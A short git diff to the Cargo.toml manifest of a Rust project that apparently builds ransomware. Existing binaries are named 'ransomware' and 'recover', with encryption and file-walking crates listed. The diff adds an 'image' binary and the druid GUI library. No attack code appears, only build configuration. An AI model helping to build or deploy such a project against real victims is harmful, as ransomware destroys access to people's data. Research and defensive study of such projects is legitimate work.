--- a/Cargo.toml
+++ b/Cargo.toml
@@ -11,6 +11,10 @@ path = "src/ransomware.rs"
 name = "recover"
 path = "src/recover.rs"
 
+[[bin]]
+name = "image"
+path = "src/image.rs"
+
 # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 
 [dependencies]
@@ -19,6 +23,7 @@ walkdir = "2.3"
 chacha20poly1305 = { version = "0.9.0", features = ["stream"] }
 openssl = { version = "0.10", features = ["vendored"] }
 base64 = "0.13"
+druid = { git = "https://github.com/linebender/druid.git", features = ["image", "png"] }
 
 [profile.release]
 strip = true
